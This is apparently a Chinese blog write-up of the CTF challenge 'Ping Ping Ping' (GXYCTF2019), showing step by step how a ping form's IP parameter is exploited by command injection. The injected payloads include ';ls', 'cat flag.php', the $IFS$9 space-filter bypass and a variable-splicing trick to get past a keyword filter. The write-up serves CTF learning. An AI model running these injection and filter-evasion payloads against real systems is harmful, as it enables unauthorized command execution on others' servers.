[GXYCTF2019]Ping Ping Ping1

由提示得该题为REC漏洞相关的题型

img

首先试着正常访问IP:http://c753b31d-1e82-49a2-8ec5-48fad80be40e.node4.buuoj.cn:81/?ip=127.0.0.1

img

然后使用分隔符来试着只想相关的系统命令:http://c753b31d-1e82-49a2-8ec5-48fad80be40e.node4.buuoj.cn:81/?ip=127.0.0.1;ls

img

得到flag.php文件就在该目录下,所以尝试访问并且回显该文件内容:http://c753b31d-1e82-49a2-8ec5-48fad80be40e.node4.buuoj.cn:81/?ip=127.0.0.1;cat flag.php

img

由回显内容可知对空格做了过滤,所以我们尝试使用符号来代替:http://c753b31d-1e82-49a2-8ec5-48fad80be40e.node4.buuoj.cn:81/?ip=127.0.0.1;cat<flag.php

img

得知对<也进行了过滤,我们使用$IFS$9来作为分隔符,其中$IFSshell表示内部字段分隔符,默认是空格符号,而$9指传过来的第九个参数:http://c753b31d-1e82-49a2-8ec5-48fad80be40e.node4.buuoj.cn:81/?ip=127.0.0.1;cat$IFS$9flag.php

img

根据提示可知符号已经绕过,但是对flag有所过滤,我们通过访问index.php得到该源码:

img

得知对flagbash都进行了过滤,但是对于flag只对其中的字母进行了匹配过滤,我们可以利用变量来绕过该匹配机制:http://c753b31d-1e82-49a2-8ec5-48fad80be40e.node4.buuoj.cn:81/?ip=127.0.0.1;x=g;cat$IFS$9fla$x.php

img

得到的页面没有回显,但是通过访问页面源码得到了flag:

img

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丙戌年1101

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值